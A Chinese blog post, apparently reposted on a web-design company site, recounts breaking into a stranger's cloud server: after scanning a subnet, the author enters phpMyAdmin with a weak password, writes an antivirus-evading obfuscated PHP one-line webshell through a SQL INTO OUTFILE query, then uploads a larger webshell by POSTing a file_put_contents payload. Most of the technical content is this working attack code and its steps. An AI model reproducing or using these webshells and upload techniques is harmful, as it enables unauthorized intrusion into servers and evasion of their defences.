解读木马GetShell的另类姿势

0×00 工欲善其事,必先利其器

创新互联-专业网站定制、快速模板网站建设、高性价比大通网站开发、企业建站全套包干低至880元,成熟完善的模板库,直接使用。一站式大通网站制作公司更省心,省钱,快速模板网站建设找我们,业务覆盖大通地区。费用合理售后完善,10年实体公司更值得信赖。

其实吧,之前是想写一长篇小说的,把整个过程详细的写一遍,怕各位看官拍砖,转了话风 ……

中间件:

XAMPP(能运行PHP程序即可)

‍‍武器:

Chrome浏览器、Proxy SwitchySharp代理插件、Advanced REST client插件(核武器)

‍‍函数:

file_put_contents()、urlencode()、urldecode()、php_strip_whitespace() -- PHP函数

0×01 上小马

扫C段时发现一机器有phpMyAdmin服务,就尝试了一下弱口令,root123果断进入,然后就开始了下面的故事。

探测IP为阿里云服务器,普通的一句话木马一写入就被杀掉,后改为混淆一句话木马:

 
 
 
 
    
  
  
  
  
  1. 
  
  
  
  
  2. @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r';                    
    3. 
  
  
  
  
  3. @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t';                    
    4. 
  
  
  
  
  4. @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}                    
    5. 
  
  
  
  
  5. [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);  
    6. 
  
  
  
  
  6. //密码-7    
    7. 
  
  
  
  
  7. ?> 
    8.

一句话木马原形:

 
 
 
 
    
  
  
  
  
  1. assert($_POST[-7]); 
    2.

写入一句话木马SQL(网站路径从phpinfo.php获得,其它姿势亦可):

 
 
 
 
    
  
  
  
  
  1. use test;  
    2. 
  
  
  
  
  2. drop table if exists temp;  
    3. 
  
  
  
  
  3. create table temp (cmd text NOT NULL);  
    4. 
  
  
  
  
  4. insert into temp (cmd) values(" ");  
    5. 
  
  
  
  
  5. select cmd from temp into outfile 'D:/phpStudy/WWW/phpMyAdmin/indxe.php';  
    6. 
  
  
  
  
  6. drop table if exists temp; 
    7.

 

0×02 处理大马

 

用菜刀连接一句话木马,连接上后即提示"连接被重置",估计是屏蔽了本机的出口IP,用VPN、切换代理后同样的问题还是会即时出现,所以放弃用菜刀上传webshell,尝试手工post的方法。

这里需要先确定下服务器上file_put_contents()函数是否执行,可行的话再执行下面的操作。

首先在本地把大马处理好以便于作为post参数:

用到了strip_whitespace()函数【返回已删除PHP注释以及空白字符的源代码文件】,urlencode()函数【对字符串进行url编码处理】,file_get_contents()函数【读取txt文件内容】。

C盘根目录下需要放一个strip_shell.php文件(待strip_whitespace的php大马),新建strip.php文件和urlencode.php文件,两文件内容分别为(注意两个函数参数):

 
 
 
 
    
  
  
  
  
  1. strip.php:  
    2. 
  
  
  
  
  2. 
  
  
  
  
  3. echo php_strip_whitespace('strip_shell.php');  
    4. 
  
  
  
  
  4. ?>  
    5. 
  
  
  
  
  5. urlencode.php:  
    6. 
  
  
  
  
  6. 
  
  
  
  
  7. echo urlencode(file_get_contents('urlencode_shell.php'));  
    8. 
  
  
  
  
  8. ?> 
    9.

执行过程如下(注意文件名称变化和执行顺序):

 

所有文件如下:

 

其中urldecode.php文件为最终处理的文件,文件内容如下:

 

0×03 GetShell

最后请出主角Advanced REST client插件,长这样:

 

这里只需用到POST方法,上面一句话小马的密码为-7,即这里Payload模块的key为-7,参数重要部分如下:

 
 
 
 
    
  
  
  
  
  1. file_put_contents("D:/phpStudy/WWW/phpMyAdmin/mysqlx.php",urldecode("复制urldecode.php文件所有内容")); 
    2.

最后POST表单如下:

 

至此,成功GetShell,有错误或好的建议请指正提出。

本文标题:解读木马GetShell的另类姿势
转载来于:http://www.shufengxianlan.com/qtweb/news21/531371.html

网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联

猜你还喜欢下面的内容

网站制作知识

行业网站建设

雅安机房托管    网络推广外包    网站seo优化    胜锦安防科技    四川成都托管服务器    成都封阳台    石膏隔墙    成都网站制作    四川服务器托管    成都h5建站开发    主机租用    成都网站制作    响应式网站设计    简阳机房托管    什邡做网站    高端定制网站设计    绵阳网站建设公司    云服务器    新型地坪材料    ssl证书申请